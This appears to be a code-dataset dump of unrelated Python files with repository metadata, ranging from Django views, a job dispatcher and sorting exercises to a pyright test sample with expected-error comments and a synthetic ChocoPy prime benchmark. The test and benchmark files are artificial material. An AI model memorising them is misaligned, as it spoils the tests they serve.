def __init__(self, dim, device, base=10000, bias=0):
super(PosEncoding, self).__init__()
p = []
sft = []
for i in range(dim):
b = (i - i % 2) / dim
p.append(base ** -b)
if i % 2:
sft.append(np.pi / 2.0 + bias)
else:
sft.append(bias)
self.device = device
self.sft = torch.tensor(sft, dtype=t_float).view(1, -1).to(device)
self.base = torch.tensor(p, dtype=t_float).view(1, -1).to(device)
def forward(self, pos):
with torch.no_grad():
if isinstance(pos, list):
pos = torch.tensor(pos, dtype=t_float).to(self.device)
pos = pos.view(-1, 1)
x = pos / self.base + self.sft
return torch.sin(x)
if __name__ == '__main__':
# test_multi_select()
pos_enc = PosEncoding(128, 'cpu')
print(pos_enc([1, 2, 3]))
| [
"[email protected]"
] | |
b7b026f7642d82363d9802fe0d817ba66118aad4 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_11022-1357/sdB_EC_11022-1357_lc.py | 350257c414f2078d50e83da141fccc17f22aa32c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[166.190667,-14.236356], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_EC_11022-1357 /sdB_EC_11022-1357_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
0bd82e74ba3c6621cb7fa14b9f43311bc864df59 | 3a28b1a12d0710c06f6360381ad8be6cf3707907 | /modular_model/triHPC/triHPCThermo/HPCAllTrays23CstmVapN2.py | b31256787ee26b7321199ab3098b7e3d1d66394a | [] | no_license | WheatZhang/DynamicModelling | 6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02 | ea099245135fe73e8c9590502b9c8b87768cb165 | refs/heads/master | 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | def VapN2(P,T,x_N2):
x = (P-5.50184878e+02)/3.71707400e-01
y = (T--1.77763832e+02)/1.81029000e-02
z = (x_N2-9.82420040e-01)/2.44481265e-03
output = \
1*-8.60567815e-01+\
z*1.86073097e+00+\
y*8.60696199e-01+\
x*-4.21414345e-01
y_N2 = output*1.31412243e-03+9.90969573e-01
    return y_N2
| [
"[email protected]"
] | |
7a09c2d76104f8dd348cfb5c054d8ed6d565d3e1 | b212ec9d705fb77cac102dceb12eb668099fd1ae | /oop/exams/december_2020/tests/project/spaceship/spaceship.py | 0defe638ec725097b266e2afa6f7fdba3fb197b5 | [] | no_license | xpucko/Software-University-SoftUni | 20ef91a0be91a8a09a56d9fdc15888f91409de2f | a1fc1781424f025954948299be7f75d317e32dc1 | refs/heads/master | 2023-02-04T11:58:33.068431 | 2020-12-24T00:39:11 | 2020-12-24T00:39:11 | 280,227,310 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | class Spaceship:
SPACESHIP_FULL = "Spaceship is full"
ASTRONAUT_EXISTS = "Astronaut {} Exists"
ASTRONAUT_NOT_FOUND = "Astronaut Not Found"
ASTRONAUT_ADD = "Added astronaut {}"
ASTRONAUT_REMOVED = "Removed {}"
ZERO_CAPACITY = 0
def __init__(self, name: str, capacity: int):
self.name = name
self.capacity = capacity
self.astronauts = []
def add(self, astronaut_name: str) -> str:
if len(self.astronauts) == self.capacity:
raise ValueError(self.SPACESHIP_FULL)
if astronaut_name in self.astronauts:
raise ValueError(self.ASTRONAUT_EXISTS.format(astronaut_name))
self.astronauts.append(astronaut_name)
return self.ASTRONAUT_ADD.format(astronaut_name)
def remove(self, astronaut_name: str) -> str:
if astronaut_name not in self.astronauts:
raise ValueError(self.ASTRONAUT_NOT_FOUND.format(astronaut_name))
self.astronauts.remove(astronaut_name)
return self.ASTRONAUT_REMOVED.format(astronaut_name)
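
if __name__ == "__main__":
    # Usage sketch (added; the names are illustrative, not from the exam text):
    ship = Spaceship("Apollo", capacity=2)
    print(ship.add("Neil"))       # Added astronaut Neil
    print(ship.add("Buzz"))       # Added astronaut Buzz
    try:
        ship.add("Michael")
    except ValueError as error:
        print(error)              # Spaceship is full
    print(ship.remove("Buzz"))    # Removed Buzz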
| [
"[email protected]"
] | |
a67b3be8bf770a11a0515a42fe9e37b479324764 | 297497957c531d81ba286bc91253fbbb78b4d8be | /testing/web-platform/tests/tools/manifest/utils.py | 5cd53c22e7745bd3656dadd6940aa4d5f33f4f19 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 2,232 | py | import os
import subprocess
import sys
from typing import Any, Callable, Generic, Optional, Text, TypeVar
T = TypeVar("T")
def rel_path_to_url(rel_path: Text, url_base: Text = "/") -> Text:
assert not os.path.isabs(rel_path), rel_path
if url_base[0] != "/":
url_base = "/" + url_base
if url_base[-1] != "/":
url_base += "/"
return url_base + rel_path.replace(os.sep, "/")
def from_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "/" == os.path.sep:
rv = path
else:
rv = path.replace(os.path.sep, "/")
if "\\" in rv:
raise ValueError("path contains \\ when separator is %s" % os.path.sep)
return rv
def to_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "\\" in path:
raise ValueError("normalised path contains \\")
if "/" == os.path.sep:
return path
return path.replace("/", os.path.sep)
def git(path: Text) -> Optional[Callable[..., Text]]:
def gitfunc(cmd: Text, *args: Text) -> Text:
full_cmd = ["git", cmd] + list(args)
try:
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
except Exception as e:
if sys.platform == "win32" and isinstance(e, WindowsError):
full_cmd[0] = "git.bat"
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
else:
raise
try:
gitfunc("rev-parse", "--show-toplevel")
except (subprocess.CalledProcessError, OSError):
return None
else:
return gitfunc
class cached_property(Generic[T]):
def __init__(self, func: Callable[[Any], T]) -> None:
self.func = func
self.__doc__ = getattr(func, "__doc__")
self.name = func.__name__
def __get__(self, obj: Any, cls: Optional[type] = None) -> T:
if obj is None:
return self
assert self.name not in obj.__dict__
rv = obj.__dict__[self.name] = self.func(obj)
obj.__dict__.setdefault("__cached_properties__", set()).add(self.name)
return rv
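
if __name__ == "__main__":
    # Minimal demonstration (added): the wrapped function runs once per
    # instance; later reads hit the value cached in the instance __dict__.
    class _Demo(object):
        calls = 0

        @cached_property
        def value(self) -> int:
            _Demo.calls += 1
            return 42

    d = _Demo()
    assert d.value == 42 and d.value == 42 and _Demo.calls == 1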
| [
"[email protected]"
] | |
c10025495e49e178e839ee495b8d2b7559ca3fc4 | 6b16458a0c80613a66c251511462e7a7d440970e | /packages/pyright-internal/src/tests/samples/variadicTypeVar5.py | 8089b00a89ef9b4f7adfc12be8efb3939e34e3d4 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | ikamensh/pyright | 3bbbb2cf1a1bdbbecb89ef389036756f47ef7114 | 5ea620ad2008de57dcac720a84674bdb712bffc4 | refs/heads/main | 2023-08-26T05:54:43.660282 | 2021-10-30T16:35:06 | 2021-10-30T16:35:06 | 422,952,836 | 0 | 0 | NOASSERTION | 2021-10-30T17:52:03 | 2021-10-30T17:52:02 | null | UTF-8 | Python | false | false | 2,648 | py | # This sample tests the handling of variadic type variables used
# within Callable types.
# pyright: reportMissingModuleSource=false
from typing import Any, Callable, Literal, Protocol, Union
from typing_extensions import TypeVarTuple, Unpack
_Xs = TypeVarTuple("_Xs")
def func1(func: Callable[[int, Unpack[_Xs]], Any]) -> Callable[[Unpack[_Xs]], int]:
...
def func2(func: Callable[[Unpack[_Xs]], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback1(a: int) -> int:
...
def callback2(a: str) -> int:
...
def callback3(a: str) -> None:
...
def callback4(a: int, b: complex, c: str) -> int:
...
def callback5(a: int, *args: Unpack[_Xs]) -> Union[Unpack[_Xs]]:
...
def callback6(a: int, *args: Any) -> int:
...
def callback7(a: int, b: str, c: str, d: str, *args: Any) -> int:
...
c1 = func1(callback1)
t_c1: Literal["() -> int"] = reveal_type(c1)
c1_1 = c1()
t_c1_1: Literal["int"] = reveal_type(c1_1)
# This should generate an error.
c2 = func1(callback2)
# This should generate an error.
c3 = func2(callback3)
c4 = func1(callback4)
t_c4: Literal["(complex, str) -> int"] = reveal_type(c4)
c4_1 = c4(3j, "hi")
t_c4_1: Literal["int"] = reveal_type(c4_1)
# This should generate an error.
c4_2 = c4(3j)
# This should generate an error.
c4_3 = c4(3j, "hi", 4)
c5 = func1(callback5)
t_c5: Literal["(*_Xs@callback5) -> int"] = reveal_type(c5)
# This should generate an error.
c6_1 = func1(callback6)
# This should generate an error.
c6_2 = func2(callback6)
# This should generate an error.
c7_1 = func1(callback7)
# This should generate an error.
c7_2 = func2(callback7)
class CallbackA(Protocol[Unpack[_Xs]]):
def __call__(self, a: int, *args: Unpack[_Xs]) -> Any:
...
def func3(func: CallbackA[Unpack[_Xs]]) -> Callable[[Unpack[_Xs]], int]:
...
d1 = func3(callback1)
t_d1: Literal["() -> int"] = reveal_type(d1)
# This should generate an error.
d2 = func3(callback2)
# This should generate an error.
d3 = func3(callback3)
d4 = func3(callback4)
t_d4: Literal["(complex, str) -> int"] = reveal_type(d4)
d4_1 = d4(3j, "hi")
t_d4_1: Literal["int"] = reveal_type(d4_1)
# This should generate an error.
d4_2 = d4(3j)
# This should generate an error.
d4_3 = d4(3j, "hi", 4)
def func4(func: Callable[[Unpack[_Xs], int], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback8(a: int, b: str, c: complex, d: int) -> int:
...
d5_1 = func4(callback1)
t_d5_1: Literal["() -> int"] = reveal_type(d5_1)
# This should generate an error.
d5_2 = func4(callback4)
d5_3 = func4(callback8)
t_d5_3: Literal["(int, str, complex) -> int"] = reveal_type(d5_3)
| [
"[email protected]"
] | |
f8efb8796402968e0d65adeb58b5693319539a4e | ef60f1908dba8f3854148ad1395db43a23caa850 | /libsystem/libsystem/wsgi.py | f884fcdd95b3300a8580e6a00c1f1d0ebd85e469 | [] | no_license | Richardo3/libsystem | 797403038e23778843fc7bc4146bc37eaaa11361 | 8f025a1bfd7e902b6871cac8ccbd85503de67990 | refs/heads/master | 2020-05-04T19:43:50.454937 | 2019-04-05T09:11:47 | 2019-04-05T09:11:47 | 179,405,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
WSGI config for libsystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "libsystem.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
e87040c6a1bd846558f8c253422413cbb91f6f5f | 161daf1046832d25e66858157f95eb226ecf7cdf | /Linear Regression/Single Variable Linear Regression Manually.py | 6919d3f1af1bf449d416df7b20ca966b71574d64 | [] | no_license | Dipeshpal/Machine-Learning | 551552c0f5fc922aa6f9f5ec5d522db983ae6063 | 626516ef9f0d63a67a073eab4fc266fd6510e482 | refs/heads/master | 2022-07-05T22:19:38.050175 | 2019-07-10T09:05:31 | 2019-07-10T09:05:31 | 188,903,340 | 0 | 0 | null | 2022-06-21T22:05:10 | 2019-05-27T20:10:12 | Python | UTF-8 | Python | false | false | 2,101 | py | # Linear Regression
# Import Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# load dataset
dataset = pd.read_csv('headbrain.csv')
# dropping ALL duplicate values
dataset.drop_duplicates(keep=False, inplace=True)
print("Dataset head: ", dataset.head())
print("Dataset shape: ", dataset.shape)
# Correlations Matrix (Visualize Relations between Data)
# From this we can find which param has more relations
correlations = dataset.corr()
sns.heatmap(correlations, square=True, cmap="YlGnBu")
plt.title("Correlations")
plt.show()
# Getting feature (x) and label(y)
# From correlations matrix we found Head Size(cm^3) and Brain Weight(grams) are most co-related data
x = dataset["Head Size(cm^3)"].values
y = dataset["Brain Weight(grams)"].values
# Fitting Line (Model) y = mx + c
# where, m = summation[(x-mean_x)(y-mean_y)] / summation[(x-mean_x)**2]
# c = y - mx
mean_x = np.mean(x)
mean_y = np.mean(y)
# Total number of features
l = len(x)
# numerator = summation[(x-mean_x)(y-mean_y)
# denominator = summation[(x-mean_x)**2
numerator = 0
denominator = 0
for i in range(l):
numerator += (x[i] - mean_x) * (y[i] - mean_y)
denominator += (x[i] - mean_x) ** 2
# m is gradient
m = numerator / denominator
# c is intercept
c = mean_y - (m * mean_x)
print("m: ", m)
print("c: ", c)
# for better visualization (Scaling of data) get max and min point of x
max_x = np.max(x) + 100
min_x = np.min(x) - 100
# X is data points (between max_x and min_y)
X = np.linspace(max_x, min_x, 10)
# model here (we know m and c, already calculated above on sample dataset)
Y = m*X + c
# plotting graph for model
plt.plot(X, Y, color='#58b970', label='Regression Line')
plt.scatter(x, y, c='#ef5424', label='Scatter Plot:n Given Data')
plt.legend()
plt.show()
# Calculate R Square
sst = 0
ssr = 0
for i in range(l):
y_pred = m * x[i] + c
sst += (y[i] - mean_y) ** 2
ssr += (y[i] - y_pred) ** 2
# print("Sum of Squared Total: ", sst)
# print("Sum of Squared due to Regression: ", ssr)
r2 = 1 - (ssr / sst)
print("R Squared: ", r2)
| [
"[email protected]"
] | |
714834b479f46b3a9ea7d245e0736f11a96e7357 | 52efcaacf23e2345d09a1de61610a74df457057f | /auto_derby/__init__.py | 7b72bc0d8b1659b8117b05e1211ef6877a5160d5 | [
"MIT"
] | permissive | debi-derby/auto-derby | 78bc726e8243c8a25ddc13b364b7289f322caaaa | c2e5c138125cac6dc13dbd74045161ca03f6e5cf | refs/heads/master | 2023-09-03T09:03:35.305321 | 2021-11-02T16:18:45 | 2021-11-02T16:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | from ._config import config
from .plugin import Plugin
| [
"[email protected]"
] | |
aeb178754d3e11d4c0785eac82d396cb1a9efc7e | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/prime-big-431.py | 6dff84319c64e9671d5fbc210e23958e95c5317e | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,705 | py | # Get the n-th prime starting from 2
def get_prime(n:int) -> int:
candidate:int = 2
found:int = 0
while True:
if is_prime(candidate):
found = found + 1
if found == n:
return candidate
candidate = candidate + 1
return 0 # Never happens
def is_prime(x:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime2(x:int, x2:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime3(x:int, x2:int, x3:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime4(x:int, x2:int, x3:int, x4:int) -> bool:
div:int = 2
    div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime5(x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
# Input parameter
n:int = 15
n2:int = 15
n3:int = 15
n4:int = 15
n5:int = 15
# Run [1, n]
i:int = 1
i2:int = 1
i3:int = 1
i4:int = 1
i5:int = 1
# Crunch
while i <= n:
print(get_prime(i))
i = i + 1
| [
"[email protected]"
] | |
6cd6e5909a0368323c8af0e4fa9a44957c2f0f36 | 5636cb0c282d03e91a830d30cec3bd54c225bd3b | /P_05_AlgorithmiqueProgrammation/03_Tris/TD_01_Bulles/programmes/tri_bulles.py | 3cb89b551a595d40d3e8a838803994b50a2c38c8 | [] | no_license | xpessoles/Informatique | 24d4d05e871f0ac66b112eee6c51cfa6c78aea05 | 3cb4183647dc21e3acbcbe0231553a00e41e4e55 | refs/heads/master | 2023-08-30T21:10:56.788526 | 2021-01-26T20:57:51 | 2021-01-26T20:57:51 | 375,464,331 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import random
def tri_bulles_naif(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
def tri_bulles(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-i-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles_naif(l)
print(l)
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles(l)
print(l)
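# Sanity check (added): after tri_bulles, l must equal Python's built-in sort.
assert l == sorted(l)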
| [
"[email protected]"
] | |
1085ba45a8f735ea9ea5fa371a548f5de125ee1a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/a3b8b55879a04bce804d9c199db55772.py | c6ce2afde394c9c920e45ec48d6cd4dde93f53ae | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 416 | py | __author__ = 'Ben'
# on every year that is evenly divisible by 4
# except every year that is evenly divisible by 100
# unless the year is also evenly divisible by 400
def is_leap_year(year):
if year % 4 == 0 and year % 100 == 0 and year % 400 == 0:
return True
if year % 4 == 0 and year % 100 == 0:
return False
if year % 4 == 0:
return True
else:
return False
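
# Spot checks (added) against the rules quoted in the comments above:
assert is_leap_year(1996) is True    # divisible by 4
assert is_leap_year(1900) is False   # divisible by 100 but not by 400
assert is_leap_year(2000) is True    # divisible by 400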
| [
"[email protected]"
] | |
feaa11ac9c9654dcac5b82c4723fcf59931647f2 | ce60f76c6ad4c48fd6182240b302ee057809cc66 | /extra/jobqueue/dispatcher.py | a9f043e8fc7ee4f9dd606e8201f33c3083a2c6dd | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | bumps/bumps | 8ae10e8d15c0aa64e0bab6e00e7fabb2ca1b0860 | 2594e69567d534b434dc0eae727b77fdeff411d4 | refs/heads/master | 2023-08-22T17:56:49.987181 | 2023-07-26T14:22:23 | 2023-07-26T14:22:23 | 2,799,064 | 48 | 28 | NOASSERTION | 2023-07-26T14:22:24 | 2011-11-17T22:22:02 | Python | UTF-8 | Python | false | false | 6,471 | py |
from datetime import datetime, timedelta
import logging
from sqlalchemy import and_, or_, func, select
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from . import runjob, store, db, notify
from .db import Job, ActiveJob
class Scheduler(object):
def __init__(self):
db.connect()
def jobs(self, status=None):
session = db.Session()
if status:
jobs = (session.query(Job)
.filter(Job.status==status)
.order_by(Job.priority)
)
else:
jobs = (session.query(Job)
.order_by(Job.priority)
)
return [j.id for j in jobs]
def submit(self, request, origin):
session = db.Session()
# Find number of jobs for the user in the last 30 days
n = (session.query(Job)
.filter(or_(Job.notify==request['notify'],Job.origin==origin))
.filter(Job.date >= datetime.utcnow() - timedelta(30))
.count()
)
#print "N",n
job = Job(name=request['name'],
notify=request['notify'],
origin=origin,
priority=n)
session.add(job)
session.commit()
store.create(job.id)
store.put(job.id,'request',request)
return job.id
def _getjob(self, id):
session = db.Session()
return session.query(Job).filter(Job.id==id).first()
def results(self, id):
job = self._getjob(id)
try:
return runjob.results(id)
except KeyError:
if job:
return { 'status': job.status }
else:
return { 'status': 'UNKNOWN' }
def status(self, id):
job = self._getjob(id)
return job.status if job else 'UNKNOWN'
def info(self,id):
request = store.get(id,'request')
return request
def cancel(self, id):
session = db.Session()
(session.query(Job)
.filter(Job.id==id)
.filter(Job.status.in_('ACTIVE','PENDING'))
.update({ 'status': 'CANCEL' })
)
session.commit()
def delete(self, id):
"""
Delete any external storage associated with the job id. Mark the
job as deleted.
"""
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': 'DELETE'})
)
store.destroy(id)
def nextjob(self, queue):
"""
Make the next PENDING job active, where pending jobs are sorted
by priority. Priority is assigned on the basis of usage and the
order of submissions.
"""
session = db.Session()
# Define a query which returns the lowest job id of the pending jobs
# with the minimum priority
_priority = select([func.min(Job.priority)],
Job.status=='PENDING')
min_id = select([func.min(Job.id)],
and_(Job.priority == _priority,
Job.status == 'PENDING'))
for _ in range(10): # Repeat if conflict over next job
# Get the next job, if there is one
try:
job = session.query(Job).filter(Job.id==min_id).one()
#print job.id, job.name, job.status, job.date, job.start, job.priority
except NoResultFound:
return {'request': None}
# Mark the job as active and record it in the active queue
(session.query(Job)
.filter(Job.id == job.id)
.update({'status': 'ACTIVE',
'start': datetime.utcnow(),
}))
activejob = db.ActiveJob(jobid=job.id, queue=queue)
session.add(activejob)
# If the job was already taken, roll back and try again. The
# first process to record the job in the active list wins, and
# will change the job status from PENDING to ACTIVE. Since the
# job is no longer pending, the so this
# should not be an infinite loop. Hopefully if the process
# that is doing the transaction gets killed in the middle then
# the database will be clever enough to roll back, otherwise
# we will never get out of this loop.
try:
session.commit()
except IntegrityError:
session.rollback()
continue
break
else:
logging.critical('dispatch could not assign job %s'%job.id)
raise IOError('dispatch could not assign job %s'%job.id)
request = store.get(job.id,'request')
# No reason to include time; email or twitter does that better than
# we can without client locale information.
notify.notify(user=job.notify,
msg=job.name+" started",
level=1)
return { 'id': job.id, 'request': request }
def postjob(self, id, results):
# TODO: redundancy check, confirm queue, check sig, etc.
# Update db
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': results.get('status','ERROR'),
'stop': datetime.utcnow(),
})
)
(session.query(ActiveJob)
.filter(ActiveJob.jobid == id)
.delete())
try:
session.commit()
except:
session.rollback()
# Save results
store.put(id,'results',results)
# Post notification
job = self._getjob(id)
if job.status == 'COMPLETE':
if 'value' in results:
status_msg = " ended with %s"%results['value']
else:
status_msg = " complete"
elif job.status == 'ERROR':
status_msg = " failed"
elif job.status == 'CANCEL':
status_msg = " cancelled"
else:
status_msg = " with status "+job.status
# Note: no reason to include time; twitter or email will give it
# Plus, doing time correctly requires knowing the locale of the
# receiving client.
notify.notify(user=job.notify,
msg=job.name+status_msg,
level=2)
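
# Worker-loop sketch (added; the queue name and the runner call are
# placeholders -- this module only defines the scheduling side):
#
#   scheduler = Scheduler()
#   job = scheduler.nextjob(queue='worker-1')
#   if job['request'] is not None:
#       results = run_job_somehow(job['id'], job['request'])  # hypothetical
#       scheduler.postjob(job['id'], results)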
| [
"[email protected]"
] | |
eebbab8cc0fe982d9573dbef8fc19af5181a7c48 | 9b77f1e31d5901924431a2a3164312cc346bde4f | /ADI_MINI_PROJECT/blog/views.py | 77aca8b4054fcba1c1dd859c800aa3a307556c0c | [] | no_license | Adi19471/Djnago_Code-Daily | c2184bf21db5c8d4b3c4098fbd593e4949375ae8 | 03b1b70d3e187fe85eb24e88b7ef3391b14aa98c | refs/heads/master | 2023-08-14T14:36:36.144243 | 2021-09-20T12:52:46 | 2021-09-20T12:52:46 | 375,690,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,673 | py | from django.shortcuts import render,HttpResponseRedirect
from .forms import SignupForm,LoginForm,PostForm
from django.contrib import messages
from django.contrib.auth import authenticate,login,logout
from .models import Post
# home page
def home(request):
posts = Post.objects.all()
return render(request, 'blog/home.html',{'posts':posts})
#about page
def about(request):
return render(request, 'blog/about.html')
# contact page
def contact(request):
return render(request, 'blog/contact.html')
# dahsboard page
def dashbord(request):
if request.user.is_authenticated:
posts = Post.objects.all()
        messages.info(request, 'You have entered the Dashboard!')
return render(request, 'blog/dashbord.html',{'posts':posts})
else:
return HttpResponseRedirect('/login/')
# logout page
def user_logout(request):
logout(request)
return HttpResponseRedirect('/')
#signup page
def user_signup(request):
if request.method == "POST":
form = SignupForm(request.POST)
if form.is_valid():
            messages.info(request, 'Congratulations! You have become an Author.')
form.save()
else:
form = SignupForm()
return render(request, 'blog/signup.html',{'form':form})
# login page
def user_login(request):
if not request.user.is_authenticated:
if request.method == "POST":
form = LoginForm(request=request, data=request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
upass = form.cleaned_data['password']
user = authenticate(username=uname, password=upass)
if user is not None:
login(request, user)
messages.success(request, 'Logged in Successfully !!')
return HttpResponseRedirect('/dashbord/')
else:
form = LoginForm()
return render(request, 'blog/login.html', {'form':form})
else:
return HttpResponseRedirect('/dashbord/')
# add new post
def add_post(request):
if request.user.is_authenticated:
if request.method =='POST':
form = PostForm(request.POST)
if form.is_valid():
ti = form.cleaned_data['title']
de = form.cleaned_data['desc']
dt = form.cleaned_data['date_time']
user = Post(title=ti,desc=de,date_time=dt)
user.save()
                messages.warning(request, 'Post saved. Please go to the Dashboard menu.')
form = PostForm()
else:
form = PostForm()
return render(request,'blog/addpost.html',{'form':form})
else:
        return HttpResponseRedirect('/login/')
# update post
def update_post(request,id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk=id)
form = PostForm(request.POST,instance=pi)
if form.is_valid():
form.save()
else:
pi = Post.objects.get(pk=id)
form = PostForm(instance=pi)
return render(request,'blog/update.html',{'form':form})
else:
        return HttpResponseRedirect('/login/')
# delete post
# def delete_post(request,id):
# if request.user.is_authenticated:
# if request.method == 'POST':
# pi = Post.objects.get(pk = id)
# pi.delete()
# return HttpresponseRedirect('/dashbord/'
# else:
# return HttpresponseRedirect('/login/')
def delete_post(request, id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk = id)
pi.delete()
return HttpResponseRedirect('/dashbord/')
else:
return HttpResponseRedirect('/login/')
| [
"[email protected]"
] | |
3184b1daec047b0a000f90524e73ffa75afdad91 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/4/k3t.py | 9810316e4d55d2272be6a2e8490993ef2354650e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'k3T':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
    main(sys.argv[1])
| [
"[email protected]"
] | |
35a9a876dc10d8de63623e6d3d37890bb3842900 | bea3febeda4c0688dfbb2db584ab4f7d710040e0 | /django/cbv/person/views.py | c954514b57714390b9b1210f810dd5c51ab31499 | [] | no_license | airpong/TIL-c9 | c471ac73e23716cf677ba590dd6099e584c42883 | 069cc53820a09cd9787765ad41ba7e792dc342b5 | refs/heads/master | 2022-12-12T22:26:23.147651 | 2019-06-27T08:24:44 | 2019-06-27T08:24:44 | 166,777,129 | 0 | 0 | null | 2022-11-22T03:46:57 | 2019-01-21T08:34:01 | Python | UTF-8 | Python | false | false | 999 | py | from django.shortcuts import render,redirect
from .models import Person
from .forms import PersonForm
from django.views.generic import ListView,CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
# def list(request):
# people = Person.objects.all()
# return render(request,'person/person_list.html',{'people':people})
class PersonList(ListView):
model = Person
context_object_name = 'people'
# def create(request):
# if request.method == 'GET':
# form = PersonForm()
# return render(request,'person/person_form.html',{'form':form})
# else:
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# age = request.POST.get('age')
# Person.objects.create(last_name=last_name,email=email,age=age)
# return redirect('list')
class PersonCreate(LoginRequiredMixin,CreateView):
model = Person
form_class = PersonForm
    success_url = '/person/'
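
# Hypothetical urls.py wiring for the two class-based views above (paths and
# route names are assumptions, chosen to match the redirects in this module):
#
#   from django.urls import path
#   from .views import PersonList, PersonCreate
#
#   urlpatterns = [
#       path('person/', PersonList.as_view(), name='list'),
#       path('person/new/', PersonCreate.as_view(), name='create'),
#   ]
| [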
"[email protected]"
] | |
